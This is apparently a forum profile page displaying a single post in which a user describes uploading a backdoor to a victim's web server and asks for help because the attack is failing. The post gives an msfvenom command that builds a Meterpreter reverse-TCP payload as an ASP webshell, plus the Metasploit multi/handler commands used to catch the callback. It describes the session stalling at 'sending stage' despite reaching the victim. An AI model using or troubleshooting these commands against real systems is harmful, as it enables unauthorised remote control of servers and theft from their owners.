Jump to content

johan123

Members
  • Posts

    1
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

johan123's Achievements

Newbie

Newbie (1/14)

  1. I made a backdoor and upload to webshell, msfvenom -p windows/meterpreter/reverse_tcp LHOST=MY_IP LPORT=4444 -f asp > /root/Desktop/shell.asp From my computer, use exploit/multi/handler set payload windows/meterpreter/reverse_tcp exploit -j -z When i run this, it stuck in "sending stage"! it is strange because my ip can detect victim ip but no any session with this exploit, can someone help me?
×
×
  • Create New...